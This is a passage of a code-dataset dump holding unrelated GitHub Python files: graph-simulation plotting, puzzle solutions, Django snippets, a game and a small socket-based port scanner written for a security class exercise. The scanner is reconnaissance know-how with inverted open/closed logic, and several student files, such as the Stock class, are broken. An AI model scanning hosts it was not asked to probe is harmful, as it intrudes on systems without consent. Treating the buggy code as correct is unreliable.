__init__(self, n, m, skew= 0, **kwargs):\n super().__init__(**kwargs)\n \n self.graph = nx.barabasi_albert_graph(n, m)\n self.populateModel(n, skew)\n\nclass ClusteredPowerlawModel(Model):\n def __init__(self, n, m, skew = 0, **kwargs):\n super().__init__(**kwargs)\n \n self.graph = nx.powerlaw_cluster_graph(n, m, 0.5)\n self.populateModel(n, skew)\n \nclass RandomModel(Model):\n def __init__(self, n, m, skew= 0, **kwargs):\n #m is avg degree/2\n super().__init__(**kwargs)\n p = 2*m/(n-1)\n \n self.graph =nx.erdos_renyi_graph(n, p)\n self.populateModel(n, skew)\n \nclass KarateModel(Model):\n def __init__(self, **kwargs):\n #m is avg degree/2\n super().__init__(**kwargs)\n \n self.graph =nx.karate_club_graph()\n for n in range (len(self.graph.nodes)):\n agent1 = Agent(self.getInitialState())\n self.graph.nodes[n]['agent'] = agent1\n edges = self.graph.edges() \n for e in edges: \n weight=self.getFriendshipWeight()\n \n self.graph[e[0]][e[1]]['weight'] = weight \n self.pos = nx.spring_layout(self.graph)\n\n\ndef findClusters(model):\n partition = community.best_partition(model.graph)\n return partition\n\n \ndef findAvgStateInClusters(model, part):\n states = [[] for i in range(len(set(part.values())))]\n \n for n, v in part.items():\n states[v].append(model.graph.node[n]['agent'].state)\n clusters = []\n sd = []\n clsize = []\n for c in range(len(states)):\n clusters.append(mean(states[c]))\n clsize.append(len(states[c]))\n if(len(states[c])>1):\n sd.append(stdev(states[c]))\n else:\n sd.append(0)\n return (clusters, sd, clsize)\n\ndef findAvgSDinClusters(model, part):\n states = [[] for i in range(len(set(part.values())))]\n for n, v in part.items():\n states[v].append(model.graph.node[n]['agent'].state)\n \n sd = []\n for c in range(len(states)):\n if(len(states[c])>1):\n sd.append(stdev(states[c]))\n else:\n sd.append(0)\n return sd\n\ndef drawClusteredModel(model):\n partition = findClusters(model)\n \n for k, v in partition.items():\n model.graph.node[k][\"louvain-val\"] = v\n degrees = nx.degree(model.graph)\n\n #colors = [mypalette[G.node[node][\"louvain-val\"] %9 ] for node in G.nodes()]\n# edge_col = [mypalette[model.graph.node[node][\"louvain-val\"]+1 % 8 ] for node in model.graph.nodes()]\n edge_col = []\n for node in model.graph.nodes():\n edge_col.append(mypalette[model.graph.node[node][\"louvain-val\"] % 9 ])\n \n plt.subplot(1, 2, 2, title=\"Cluster membership\")\n nx.draw(model.graph, model.pos, node_size=[d[1] * 30 for d in degrees], node_color =edge_col)\n (clusters, sd, clsize) = findAvgStateInClusters(model, part= partition)\n text = [f'x={clusters[c]:5.2f} sd={sd[c]:5.2f} n={clsize[c]}' for c in range(len(clusters))]\n #print(text)\n ax = plt.gca()\n handles = [mpatches.Patch(color=mypalette[c], label=text[c]) for c in range(len(text))]\n ax.legend(handles=handles)\n #plt.title(\"Snapshot of network with states and clusters\")\n draw_model(model)#, outline=edge_col, partition = partition)\n \n \nfrom IPython.display import Image\n\n\n#-------- drawing functions ---------\nimport matplotlib.patches as mpatches\n\ndef draw_model(model, save=False, filenumber = None, outline=None, partition=None):\n \n #plt.figure(figsize=(16,16))\n plt.subplot(1, 2, 1, title=\"State of the nodes\")\n color_map = []\n intensities = []\n #pos = []\n for node in model.graph:\n #pos.append(model.graph.nodes[node]['pos'])\n if model.graph.nodes[node]['agent'].state > 0:\n color_map.append((3/255,164/255,94/255, model.graph.nodes[node]['agent'].state))\n intensities.append(model.graph.nodes[node]['agent'].state)\n #color_map.append('#03a45e')\n #else: color_map.append('#f7796d')\n \n else: \n color_map.append((247/255,121/255,109/255, -1*model.graph.nodes[node]['agent'].state ))\n intensities.append(model.graph.nodes[node]['agent'].state)\n degrees = nx.degree(model.graph)\n #plt.subplot(121)\n nx.draw(model.graph, model.pos, node_size=[d[1] * 30 for d in degrees], linewidths=2, node_color =intensities, cmap=plt.cm.RdYlGn, vmin=-1, vmax=1 )\n #plt.colorbar(mcp)\n #plt.show()\n \n if(outline !=None):\n #mypalette = [\"blue\",\"red\",\"green\", \"yellow\", \"orange\", \"violet\", \"grey\", \"magenta\",\"cyan\", \"cyan\", \"cyan\", \"cyan\"]\n ax = plt.gca()\n ax.collections[0].set_edgecolor(outline)\n (clusters, sd, clsize) = findAvgStateInClusters(model, part= partition)\n text = [f'x={clusters[c]:5.2f} sd={sd[c]:5.2f} n={clsize[c]}' for c in range(len(clusters))]\n #print(text)\n handles = [mpatches.Patch(color=mypalette[c], label=text[c]) for c in range(len(text))]\n ax.legend(handles=handles)\n plt.title(\"Snapshot of network with states and clusters\")\n\n\n if(save):\n plt.title(filenumber)\n plt.savefig(\"plot\" + str(filenumber) +\".png\", bbox_inches=\"tight\")\n plt.close('all')\n\ndef radialDist(model, depth, isBefore):\n DefectorValues = [[0 for i in range(depth)] for j in range(len(model.graph))]\n CooperatorValues = [[0 for i in range(depth)] for j in range(len(model.graph))]\n \n for nodeIdx in model.graph:\n neighbours = list(model.graph.adj[nodeIdx])\n isCooperator = model.graph.nodes[nodeIdx]['agent'].state > 0\n parent = [nodeIdx]\n for d in range(depth):\n nextLevelNeighs = set([])\n for n in neighbours:\n nextLevelNeighs.update(list(model.graph.adj[n]))\n if(model.graph.nodes[n]['agent'].state > 0 and isCooperator):\n CooperatorValues[nodeIdx][d] += 1\n elif(model.graph.nodes[n]['agent'].state <= 0 and not isCooperator): \n DefectorValues[nodeIdx][d] += 1\n CooperatorValues[nodeIdx][d] = CooperatorValues[nodeIdx][d]/len(neighbours)\n DefectorValues[nodeIdx][d] = DefectorValues[nodeIdx][d]/len(neighbours)\n \n #make sure the parent level isn't checked again\n for n in parent:\n nextLevelNeighs.discard(n) \n parent = neighbours\n neighbours = nextLevelNeighs\n \n cooperatorRatio = model.countCooperatorRatio()\n \n cooperatorRes = []\n defectorRes = []\n for col in range(depth):\n coopSumRatios = 0\n defectSumRatios = 0\n for row in range(len(CooperatorValues)):\n coopSumRatios += CooperatorValues[row][col]\n defectSumRatios += DefectorValues[row][col]\n cooperatorRes.append(np.array(coopSumRatios)/(len(model.graph)*cooperatorRatio*cooperatorRatio))\n defectorRes.append(np.array(defectSumRatios)/(len(model.graph)*(1-cooperatorRatio)*(1-cooperatorRatio)))\n\n if isBefore:\n intensity = 0.5\n else:\n intensity = 1\n plt.xlabel(\"Distance from the nodes\")\n plt.ylabel(\"Normalised ratio of agreein neighbours\")\n plt.title(\"Distance distribution function\")\n plt.ylim((0, 2.5))\n plt.plot(range(1, len(cooperatorRes)+1), cooperatorRes, color=((23/255, 104/255, 37/255, intensity))) \n plt.plot(range(1, len(cooperatorRes)+1), defectorRes, color=((109/255, 10/255, 10/255, intensity))) \n\ndef avgRadialDist(models, depth, isBefore):\n DefectorList = []\n CooperatorList = []\n \n for model in models :\n DefectorValues = [[0 for i in range(depth)] for j in range(len(model.graph))]\n CooperatorValues = [[0 for i in range(depth)] for j in range(len(model.graph))]\n\n for nodeIdx in model.graph:\n neighbours = list(model.graph.adj[nodeIdx])\n isCooperator = model.graph.nodes[nodeIdx]['agent'].state > 0\n parent = [nodeIdx]\n for d in range(depth):\n nextLevelNeighs = set([])\n for n in neighbours:\n nextLevelNeighs.update(list(model.graph.adj[n]))\n if(model.graph.nodes[n]['agent'].state > 0 and isCooperator):\n CooperatorValues[nodeIdx][d] += 1\n elif(model.graph.nodes[n]['agent'].state <= 0 and not isCooperator): \n DefectorValues[nodeIdx][d] += 1\n if(len(neighbours) == 0):\n break\n CooperatorValues[nodeIdx][d] = CooperatorValues[nodeIdx][d]/len(neighbours)\n DefectorValues[nodeIdx][d] = DefectorValues[nodeIdx][d]/len(neighbours)\n\n #make sure the parent level isn't checked again\n for n in parent:\n nextLevelNeighs.discard(n) \n parent = neighbours\n neighbours = nextLevelNeighs\n\n cooperatorRatio = model.countCooperatorRatio()\n\n cooperatorRes = []\n defectorRes = []\n for col in range(depth):\n coopSumRatios = 0\n defectSumRatios = 0\n for row in range(len(CooperatorValues)):\n coopSumRatios += CooperatorValues[row][col]\n defectSumRatios += DefectorValues[row][col]\n if(cooperatorRatio == 0):\n cooperatorRes.append(1)\n else:\n cooperatorRes.append(np.array(coopSumRatios)/(len(model.graph)*cooperatorRatio*cooperatorRatio))\n if(cooperatorRatio == 1):\n defectorRes.append(1)\n else:\n defectorRes.append(np.array(defectSumRatios)/(len(model.graph)*(1-cooperatorRatio)*(1-cooperatorRatio)))\n DefectorList.append( defectorRes)\n CooperatorList.append( cooperatorRes)\n data = np.array(DefectorList)\n avgDefector = np.average(data, axis=0)\n data = np.array(CooperatorList)\n avgCooperator = np.average(data, axis=0)\n \n if isBefore:\n intensity = 0.5\n else:\n intensity = 1\n plt.xlabel(\"Distance from the nodes\")\n plt.ylabel(\"Normalised ratio of agreein neighbours\")\n plt.title(\"Distance distribution function\")\n plt.ylim((0, 2.5))\n plt.xlim((0.5, 5.5))\n plt.plot(range(1, len(avgDefector)+1), avgCooperator, color=((23/255, 104/255, 37/255, intensity))) \n plt.plot(range(1, len(avgDefector)+1), avgDefector, color=((109/255, 10/255, 10/255, intensity))) \n plt.show()\n\ndef drawAvgState(models, avg =False, pltNr=1, title=\"\", clusterSD = False):\n plt.xlabel(\"timesteps\")\n plt.ylabel(\"Average state\")\n #mypalette = [\"blue\",\"red\",\"green\", \"yellow\", \"orange\", \"violet\", \"grey\", \"grey\",\"grey\"]\n plt.subplot(1, 3, 1, title=\"Avg state + SD\")\n if(not avg):\n plt.ylim((-1, 1))\n for i in range(len(models)):\n plt.plot(models[i].states)\n else:\n states = []\n sds = []\n plt.ylim((-1, 1))\n for i in range(len(models)):\n states.append(models[i].states)\n sds.append(models[i].statesds)\n array = np.array(states)\n avg = array.mean(axis=0)\n std = np.array(sds).mean(axis=0)\n plt.plot(avg, color=mypalette[pltNr-1], label=title)\n plt.plot(std, color=col.to_rgba(mypalette[pltNr-1], 0.5))\n #plt.plot(avg+std, color=col.to_rgba(mypalette[pltNr-1], 0.5))\n text = [\"rand cont\", \"cl cont\", \"rand disc\", \"cl disc\"]\n handles = [mpatches.Patch(color=mypalette[c], label=text[c]) for c in range(len(text))]\n plt.legend(handles=handles)\n if(clusterSD):\n avgSds = []\n for mod in models:\n #print(mod.clusterSD)\n array = np.array(mod.clusterSD)\n avgSd = array.mean(axis=1)\n avgSds.append(avgSd)\n array = np.array(avgSds)\n avgAvgSd = array.mean(axis=0)\n plt.plot(avgAvgSd, color=mypalette[pltNr-1], linestyle=\":\")\n\n #plt.subplot(1, 2, 2)\n #plt.ylim((0, 1))\n #plt.plot(std, color=mypalette[pltNr-1])\n\ndef drawCrossSection(models, pltNr = 1):\n values = []\n #mypalette = [\"blue\",\"red\",\"green\", \"yellow\", \"orange\", \"violet\", \"grey\", \"grey\",\"grey\"]\n for model in models:\n values.append(model.states[-1])\n plt.subplot(1, 3, 2, title=\"Density Plot of state for simulations\")\n plt.xlim((0, 2))\n plt.ylim((-1, 1))\n #plt.title('Density Plot of state for simulations')\n #plt.xlabel('avg state of cooperators after all time steps')\n plt.xlabel('Density')\n try:\n sns.distplot(values, hist=False, kde=True, color = mypalette[pltNr-1], vertical=True)\n except:\n sns.distplot(values, hist=True, kde=False, color = mypalette[pltNr-1], vertical=True)\n\n #plt.show()\n\ndef drawClustersizes(models, pltNr = 1):\n #mypalette = [\"blue\",\"red\",\"green\", \"yellow\", \"orange\", \"violet\", \"grey\", \"grey\",\"grey\"]\n sizes = []\n for model in models:\n part = findClusters(model)\n (avg, sd, size) = findAvgStateInClusters(model, part)\n for s in size:\n sizes.append(s)\n plt.subplot(1, 3, 3, title=\"Density Plot of clustersize simulations\")\n plt.xlabel(\"Clustersize\")\n sns.distplot(sizes, hist=True, kde=True, color = mypalette[pltNr-1])\n\ndef drawConvergence(variables, modelsList, pltNr = 1):\n #mypalette = [\"blue\",\"red\",\"green\", \"yellow\", \"orange\", \"violet\", \"grey\", \"grey\",\"grey\"]\n\n endState = []\n for models in modelsList:\n values = []\n for model in models:\n values.append(model.states[-1])\n endState.append(mean(values))\n plt.subplot(1,2,2)\n plt.xlim((-1, 1))\n plt.ylim((-1, 1))\n plt.scatter(variables, endState, color=mypalette[pltNr-1])\n\ndef drawClusterState(models, pltNr = 1):\n plt.subplot(1, 3, 3, title=\"Avg state in clusters\")\n states = []\n plt.ylim((-1, 1))\n for i in range(len(models)):\n print(models[i].clusteravg[0])\n for c in models[i].clusteravg[0]:\n states.append(c)\n plt.xlim((0, 2))\n plt.ylim((-1, 1))\n #plt.title('Density Plot of state for simulations')\n #plt.xlabel('avg state of cooperators after all time steps')\n plt.xlabel('Density')\n print(states)\n try:\n sns.distplot(states, hist=True, kde=True, color = mypalette[pltNr-1], vertical=True)\n except:\n sns.distplot(states, hist=True, kde=False, color = mypalette[pltNr-1], vertical=True)","repo_name":"sigridbra/project-collective-altruism","sub_path":"modelsq.py","file_name":"modelsq.py","file_ext":"py","file_size_in_byte":29177,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"70181691332","text":"def solution(s):\n def checker(left, right):\n nonlocal s\n while left < right:\n if s[left] != s[right]:\n return False\n left, right = left+1, right-1\n return True\n answer = 0\n for i in range(len(s)):\n left = i - answer\n while 0 <= left:\n if checker(left, i):\n answer = max(answer, i-left+1)\n left -= 1\n return answer\nprint(solution(\"abcdcba\"))\nprint(solution(\"abacde\"))","repo_name":"yusong-offx/study-problems","sub_path":"problem/programmers/lv3/가장긴펠린드롬.py","file_name":"가장긴펠린드롬.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25706725108","text":"import random as rnd\n\nclass Stock:\n def __init__(self, name, ticker, starting_price, current_price, volatility):\n self.name = name\n self.ticker = ticker\n self.starting_price = starting_price\n self.current_price = current_price\n self.volatility = volatility\n\n\n\n def list_stocks(self):\n return (\"Stock name is \" + self.name + \" and ticker is \" + self.ticker + \" and the price is \" + str(self.starting_price))\n\n s = Stock()\n\n for key, value in s.__dict__.iteritems():\n print(attr, value)\n #def __iter__(self, name, ticker, starting_price, current_price, volatility):\n #stock = Stock(self, name, ticker, starting_price, current_price, volatility)\n #for attr, value in stock.__dict__.items():\n #print(attr, value)\n\n# def create_market():\n# global market\n# numStocks = 5\n#\n# stock1 = Stock(\"American Broadcasting Corp\", \"ABC\", 10, 10, 1)\n# stock2 = Stock(\"Diversified Energy Force\", \"DEF\", 12, 12, 1.2)\n# stock3 = Stock(\"Global Health Inc\", \"GHI\", 14, 14, 1.8)\n# stock4 = Stock(\"Jasmine Kiloton LLC\", \"JKL\", 16, 16, 2.2)\n# stock5 = Stock(\"Minnesota Natural Order\", \"MNO\", 18, 18, 2.4)\n\n\n # for key in dir(stock):\n # if not key.startswith('__'):\n # value = getattr(stock, key)\n\n # if not callable(value):\n # print\n # key, value\n\n\ndef main():\n list_stocks()\n print(dir(Stock))\n print([a for a in dir(Stock) if not a.startswith('__')])\n\n\nmain()\n\n","repo_name":"LRBeaver/Stock_Market","sub_path":"class_three.py","file_name":"class_three.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1330623076","text":"# Escribir un programa que pida al usuario una palabra\n# y muestre por consola el n° de veces que contiene cada vocal\n\ndef leer_frase():\n global palabra\n palabra = input(\"Ingrese alguna palabra para contar las vocales: \").lower()\n\n\ndef contar_vocales():\n Letra_a = [\"a\", \"á\"]\n cont = 0\n for x in Letra_a:\n for y in palabra:\n if x == y:\n cont += 1\n print(\"El n° de veces que sale la a es de: \", cont)\n\n Letra_e = [\"e\", \"é\"]\n cont = 0\n for x in Letra_e:\n for y in palabra:\n if x == y:\n cont += 1\n print(\"El n° de veces que sale la e es de: \", cont)\n Letra_i = [\"i\", \"í\"]\n cont = 0\n for x in Letra_i:\n for y in palabra:\n if x == y:\n cont += 1\n print(\"El n° de veces que sale la i es de: \", cont)\n Letra_o = [\"o\", \"ó\"]\n cont = 0\n for x in Letra_o:\n for y in palabra:\n if x == y:\n cont += 1\n print(\"El n° de veces que sale la o es de: \", cont)\n Letra_u = [\"u\", \"ú\"]\n cont = 0\n for x in Letra_u:\n for y in palabra:\n if x == y:\n cont += 1\n print(\"El n° de veces que sale la u es de: \", cont)\n\n\n\nleer_frase()\ncontar_vocales()\n","repo_name":"Cris1579/Python-2023","sub_path":"Estructura de datos/Retos Clase/Reto n°3.py","file_name":"Reto n°3.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42450944838","text":"#!/usr/bin/env python3\n\n# Script: Ops 401 Challenge 44\n# Author: Jose Cardozo\n# Date of latest revision: 03/16/2023\n# Purpose: Ops Challenge: Create a Port Scanner\n\n\n#!/usr/bin/python3\n\nimport socket\n\nsockmod = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntimeout = 5\nsockmod.settimeout(timeout)\n\nhostip = input(\"Provide the IP Address: \")\nportno = int(input(\"Provide port number: \"))\n\ndef portScanner(portno):\n if sockmod.connect_ex((hostip, portno)) == 1:\n print(\"Port closed\")\n else:\n print(\"Port open\")\n\nportScanner(portno)","repo_name":"jusehcardozo/OpsChallenge401","sub_path":"Challenge44.py","file_name":"Challenge44.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72055606854","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"This module named 1-Square.py\n Created on Wednesday, September 21, 2022\n @author: Daisy Chipana Lapa\n\"\"\"\n\n\nclass Square:\n \"\"\"This class is named Square\n Attributes:\n Instantiation with optional size: def __init__(self, size=0):\n \"\"\"\n def __init__(self, size=0):\n \"\"\"function constructor __init_\n Args:\n size: is private attribute\n Returns:\n * if size must be an integer, raise a TypeError exception\n * if size is less than 0, raise a ValueError exception\n \"\"\"\n if isinstance(size, int) is not True:\n raise TypeError(\"size must be an integer\")\n elif size < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = size\n\n def area(self):\n \"\"\"Public instance method named area\n Args:\n self: Variable that refers to the class name\n Returns:\n The current square area\n \"\"\"\n area_square = self.__size ** 2\n return area_square\n","repo_name":"DaisyGeraldine/holbertonschool-higher_level_programming","sub_path":"python-classes/3-square.py","file_name":"3-square.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72577294212","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import home, post, category, about, base\n\nurlpatterns = [\n path('', base),\n path('home/', home),\n path('about/', about),\n path('blog/', post),\n path('category/', category)\n\n]","repo_name":"shivamjos1994/iBlogs","sub_path":"iblogs/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24168725674","text":"from django.contrib import admin\n\nfrom .models import Location, Phone\n\n\nclass LocationsFilter(admin.SimpleListFilter):\n title = 'Расположение'\n parameter_name = 'location'\n\n def lookups(self, request, model_admin):\n qs = model_admin.get_queryset(request)\n\n unique_locations_pks = qs.values_list('location').distinct()\n\n unique_locations = Location.objects.filter(\n pk__in=unique_locations_pks\n ).prefetch_related(\n 'room').prefetch_related(\n 'cabinet__room__building')\n\n for location in unique_locations:\n yield (location.pk, location)\n\n def queryset(self, request, queryset):\n if self.value() is not None:\n return queryset.filter(location_id=self.value())\n\n\nclass EmptyPunchBlocksFilter(admin.SimpleListFilter):\n title = 'Занятость'\n parameter_name = 'empty'\n\n def lookups(self, request, model_admin):\n return (\n (0, 'Свободные'),\n (1, 'Занятые'),\n )\n\n def queryset(self, request, queryset):\n if self.value() is not None:\n get_empty = True if self.value() == '0' else False\n queryset = queryset.filter(main_source__pbxport__isnull=get_empty)\n\n return queryset\n\n\nclass EmptyPBXPortsFilter(admin.SimpleListFilter):\n title = 'Занятость'\n parameter_name = 'ports_empty'\n\n def lookups(self, request, model_admin):\n return (\n (0, 'Свободные'),\n )\n\n def queryset(self, request, queryset):\n get_empty = True if self.value() == '0' else False\n\n if get_empty:\n phones = Phone.objects.filter(main_source__isnull=False)\n exclude_list = [x.main_source_id for x in phones]\n\n queryset = queryset.exclude(pk__in=exclude_list)\n\n return queryset\n","repo_name":"ivnglkv/cross_register","sub_path":"journal/admin_filters.py","file_name":"admin_filters.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"21351841068","text":"# -*- coding: utf-8 -*- \n\"\"\"\nDescription: LC00391 - 完美矩形\nURL: https://leetcode-cn.com/problems/perfect-rectangle/\nCreator: HarryUp\nCreate time: 2021-11-16 20:07:23\nContent:\n# 给你一个数组 rectangles ,其中 rectangles[i] = [xi, yi, ai, bi] 表示一个坐标轴平行的矩形。这个矩形的左下顶点是\n# (xi, yi) ,右上顶点是 (ai, bi) 。 \n# \n# 如果所有矩形一起精确覆盖了某个矩形区域,则返回 true ;否则,返回 false 。 \n# \n# \n# 示例 1: \n# \n# \n# 输入:rectangles = [[1,1,3,3],[3,1,4,2],[3,2,4,4],[1,3,2,4],[2,3,3,4]]\n# 输出:true\n# 解释:5 个矩形一起可以精确地覆盖一个矩形区域。 \n# \n# \n# 示例 2: \n# \n# \n# 输入:rectangles = [[1,1,2,3],[1,3,2,4],[3,1,4,2],[3,2,4,4]]\n# 输出:false\n# 解释:两个矩形之间有间隔,无法覆盖成一个矩形。 \n# \n# 示例 3: \n# \n# \n# 输入:rectangles = [[1,1,3,3],[3,1,4,2],[1,3,2,4],[3,2,4,4]]\n# 输出:false\n# 解释:图形顶端留有空缺,无法覆盖成一个矩形。 \n# \n# 示例 4: \n# \n# \n# 输入:rectangles = [[1,1,3,3],[3,1,4,2],[1,3,2,4],[2,2,4,4]]\n# 输出:false\n# 解释:因为中间有相交区域,虽然形成了矩形,但不是精确覆盖。 \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= rectangles.length <= 2 * 10⁴ \n# rectangles[i].length == 4 \n# -10⁵ <= xi, yi, ai, bi <= 10⁵ \n# \n# Related Topics 数组 扫描线 👍 180 👎 0\n\n\"\"\"\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom collections import defaultdict\n\n\nclass Solution(object):\n def isRectangleCover(self, rectangles):\n \"\"\"\n :type rectangles: List[List[int]]\n :rtype: bool\n \"\"\"\n minx, miny, maxa, maxb, area = rectangles[0][0], rectangles[0][1], rectangles[0][2], rectangles[0][3], 0\n count = defaultdict(int)\n for rectangle in rectangles:\n x = rectangle[0]\n y = rectangle[1]\n a = rectangle[2]\n b = rectangle[3]\n count[(x, y)] += 1\n count[(x, b)] += 1\n count[(a, y)] += 1\n count[(a, b)] += 1\n minx = min(minx, x)\n miny = min(miny, y)\n maxa = max(maxa, a)\n maxb = max(maxb, b)\n area += (b - y) * (a - x)\n if area != (maxa - minx) * (maxb - miny) or count[(minx, miny)] != 1 or count[(minx, maxb)] != 1 or count[\n (maxa, miny)] != 1 or count[(maxa, maxb)] != 1:\n return False\n del count[(minx, miny)], count[(minx, maxb)], count[(maxa, miny)], count[(maxa, maxb)]\n return all(cnt == 2 or cnt == 4 for cnt in count.values())\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\ns = Solution()\nrec = [[1, 1, 3, 3], [3, 1, 4, 2], [3, 2, 4, 4], [1, 3, 2, 4], [2, 3, 3, 4]]\nprint(s.isRectangleCover(rec))\n","repo_name":"JulyHarry/PythonNoob","sub_path":"LeetCode/leetcode/editor/cn/LC00391_PerfectRectangle.py","file_name":"LC00391_PerfectRectangle.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40408484331","text":"# coding: utf-8\n\"\"\"Defines the OnedataFS opener.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n__all__ = [\"OnedataFSOpener\"]\n\nfrom fs.opener import Opener\n\nfrom six.moves.urllib.parse import parse_qs, urlparse\n\nfrom ._onedatafs import OnedataFS\n\n\nclass OnedataFSOpener(Opener):\n \"\"\"\n Opener for OnedataFS.\n\n Implementation of PyFilesystem opener for OnedataFS. Allows to\n pass URI's in the form:\n `onedatafs://ONEPROVIDER_HOST:PORT?token=ACCESS_TOKEN&...`\n \"\"\"\n\n protocols = [\"onedatafs\"]\n\n def open_fs(self, fs_url, parse_result, writeable, create, cwd):\n \"\"\"Create instance of OnedataFS using opener URI.\"\"\"\n ofs = urlparse(fs_url)\n if ofs.scheme != \"onedatafs\":\n raise \"Invalid OnedataFS scheme\"\n\n host = ofs.hostname\n port = ofs.port or 443\n args = parse_qs(ofs.query)\n token = args[\"token\"][0]\n del args[\"token\"]\n cli_args = \"\"\n for k in args:\n v = args[k][0]\n if v == 'false':\n continue\n elif v == 'true':\n cli_args += \" --\" + k\n else:\n cli_args += \" --\" + k + \" \" + v\n\n return OnedataFS(host, token, port=port, cli_args=cli_args)\n","repo_name":"onedata/fs-onedatafs","sub_path":"fs/onedatafs/opener.py","file_name":"opener.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26101450246","text":"import os, shutil\n\nsource_folder = os.path.join(os.getcwd(), \"prediction dataset\")\ndestination_folder = os.path.join(os.getcwd(), \"training dataset\")\nsubfolders = ['train', 'test', 'val']\n\nfor subfolder in subfolders:\n print('working on {}.'.format(subfolder))\n image_files = os.listdir(os.path.join(source_folder, subfolder, 'images'))\n label_files = os.listdir(os.path.join(source_folder, subfolder, 'labels'))\n for image_file in image_files:\n # Copy the image file from source to destination\n shutil.copyfile(os.path.join(source_folder, subfolder, 'images', image_file), os.path.join(destination_folder, subfolder, 'images', image_file))\n for label_file in label_files:\n # Copy the label file from source to destination and modify it to be yolo compliant\n dest_file = os.path.join(destination_folder, subfolder, 'labels', label_file)\n shutil.copyfile(os.path.join(source_folder, subfolder, 'labels', label_file), dest_file)\n with open(dest_file, 'r') as lbls:\n lines = lbls.readlines()\n copy = lines[0].split()\n del lines[0]\n with open(dest_file, 'w') as file:\n file.writelines(copy[0]+'\\t'+copy[1]+'\\t'+copy[2]+'\\t'+copy[3]+'\\t'+copy[4])\n\n\n \n\n\n","repo_name":"cchandel-dev/Visual-Search-Research","sub_path":"machine learning/prediction set to training set.py","file_name":"prediction set to training set.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5535219504","text":"#This program will let a user play the high/low game\r\n#Created by: Chris Caponi\r\ngamesPlayed = 0 ###############################\r\ngamesWon = 0 #used to calculate end results# \r\nwinPerc = 0 ###############################\r\nagain = True\r\n #the program will repeat upon player input\r\nwhile again: \r\n\r\n import random\r\n secret = random.randrange(1,64) #the program will generate a random # from 1-64 inclusive.\r\n print(\"I am thinking of a number in the range of 1-64 inclusive.\")\r\n print(\"You have 7 tries to guess it.\")\r\n guess = int(input(\"What is your guess? \"))\r\n guesses = 1 #keeps track of number of guesses\r\n print(secret)\r\n \r\n\r\n \r\n for x in range(1,8): #the following code will only repeat 7 times.\r\n while (guess < 1 or guess > 64): #prevents player from moving on thru the game until entering valid input.\r\n guess = int(input(\"Your guess was outside the range, try again. \"))\r\n if (guess == secret): #when player guesses correct number, they recieve the following message w/ how many attempts it took. \r\n print(\"Congrats, you are a winner in\", guesses, \"tries!!\")\r\n gamesWon = gamesWon + 1 #adds a win after guessing the correct number.\r\n break\r\n elif (guess > secret): #provides hints as to wether or not the player guessed too high.\r\n print(\"Sorry, your guess was too high.\")\r\n guesses = guesses + 1 #tracks each attempt.\r\n if (guesses == 8):\r\n break\r\n else:\r\n guess = int(input(\"What is your guess? \"))\r\n elif (guess < secret): #provides hints as to wether or not the player guessed too low.\r\n print(\"Sorry, your guess was too low.\")\r\n guesses = guesses + 1 #tracks each attempt.\r\n if (guesses == 8):\r\n break\r\n else:\r\n guess = int(input(\"What is your guess? \"))\r\n\r\n gamesPlayed = gamesPlayed + 1 #######################\r\n winPerc = (gamesWon/gamesPlayed)*100 #Formulas for end game#\r\n ####################### \r\n if (guess == secret): #if player guesses the number, they will be asked to play again.\r\n answer = input(\"Enter yes to play again, anything else to quit. \")\r\n if (answer != \"yes\"): #if they choose to not play again, player will recieve win/loss ration and percentage.\r\n again = False\r\n print(\"You won {} out of {} for a winning percentage of {:.3f}%\".format(gamesWon, gamesPlayed, winPerc))\r\n elif (guesses == 8): #if player runs out of attempts, they will be asked if they want to play again.\r\n print(\"YOU LOSE!!\", \"The number was\",secret)\r\n answer = input(\"Enter yes to play again, anything else to quit. \")\r\n if (answer != \"yes\"): #if they choose to not play again, player will recieve win/loss ration and percentage.\r\n again = False\r\n print(\"You won {} out of {} for a winning percentage of {:.3f}%\".format(gamesWon, gamesPlayed, winPerc))\r\n \r\n \r\nprint(input(\"press enter to exit.\"))\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"crc4446/High-Low-Game","sub_path":"Lab 9.py","file_name":"Lab 9.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28109653686","text":"import tensorflow as tf\nfrom tensorflow.keras.models import load_model, Model\nfrom tensorflow.keras.layers import Layer, Input, Conv2D, BatchNormalization, MaxPooling2D, ReLU, Flatten, Dense, 